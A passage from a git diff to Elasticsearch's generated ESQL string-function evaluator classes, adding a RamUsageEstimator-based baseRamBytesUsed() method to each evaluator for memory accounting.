class HashConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HashConstantEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -58,6 +61,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock inputBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef inputScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java index aee3d333fd517..074fb0f0ea194 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java @@ -10,6 +10,7 @@ import java.security.NoSuchAlgorithmException; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class HashEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HashEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -65,6 +68,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += algorithm.baseRamBytesUsed(); + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock algorithmBlock, BytesRefBlock inputBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java index ce46bad9159f5..761bd24d5dd6f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LTrimEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LTrimEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java index 443d41a7c9ff2..36d228e8be076 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.UnicodeUtil; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeftEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeftEvaluator.class); + private final Source source; private final BytesRef out; @@ -69,6 +72,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += length.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock lengthBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java index cbfcc4f81221c..5fa536b4da617 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java index afbd759f4bbb8..de46bb4162884 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LocateEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LocateEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -70,6 +73,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += substr.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock substrBlock, IntBlock startBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java index 5c015d2a04f6f..e2330cbe5cf49 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LocateNoStartEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LocateNoStartEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += substr.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock substrBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java index 9b4a5a4165b42..b0e1aeb9ed66e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RTrimEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RTrimEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java index c0799f7187322..e24597090f69c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RepeatConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RepeatConstantEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java index 169df1f7faaae..5ec3fee744126 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RepeatEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RepeatEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -66,6 +69,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += number.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock numberBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java index f63966810a5fe..f74678ba45630 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.regex.Pattern; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ReplaceConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReplaceConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -62,6 +65,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += newStr.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock newStrBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java index 6eb3aa898b79c..5da95c21bd623 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ReplaceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReplaceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -68,6 +71,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += regex.baseRamBytesUsed(); + baseRamBytesUsed += newStr.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock regexBlock, BytesRefBlock newStrBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java index 5dbcc7c38d90b..367c0362c13c3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ReverseEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReverseEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java index 18c4087b23cb2..953a4b76f5e1a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.UnicodeUtil; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RightEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RightEvaluator.class); + private final Source source; private final BytesRef out; @@ -69,6 +72,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += length.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock lengthBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java index 80167de794eec..f6e3bfb55c22d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.function.Function; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.IntBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpaceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpaceEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += number.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, IntBlock numberBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java index 512222880b630..09e8fd103a417 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SplitSingleByteEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SplitSingleByteEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -56,6 +59,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java index d5bc8e7dcfd6d..2ba6135721ff0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SplitVariableEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SplitVariableEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -62,6 +65,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += delim.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock delimBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java index 347bd8c0747f6..383e86854b5bf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StartsWithEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StartsWithEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += prefix.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock prefixBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java index 4a754daae9453..5adf5f64a2166 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubstringEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubstringEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -70,6 +73,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += length.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock startBlock, IntBlock lengthBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git 